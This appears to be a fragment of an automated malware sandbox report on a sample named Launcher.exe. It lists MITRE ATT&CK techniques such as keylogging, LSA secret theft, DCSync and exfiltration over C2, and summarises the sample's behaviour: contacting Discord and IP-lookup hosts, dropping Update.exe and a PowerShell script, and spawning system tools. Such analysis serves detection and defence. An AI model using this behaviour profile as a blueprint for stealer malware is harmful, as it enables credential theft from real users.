        | Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Obfuscated Files or Information | LSA Secrets | 1 System Network Configuration Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
        | Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 11 File and Directory Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
        | DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Compile After Delivery | DCSync | 14 System Information Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
        [Behavior graph, ID 1632293: sample Launcher.exe, start date 07/03/2025, architecture WINDOWS, score 100. Launcher.exe contacts api.ipify.org and canary.discord.com, drops Update.exe and temp.ps1 among other files, and starts cmd.exe, reg.exe, powershell.exe, tasklist.exe, csc.exe and cvtres.exe.]
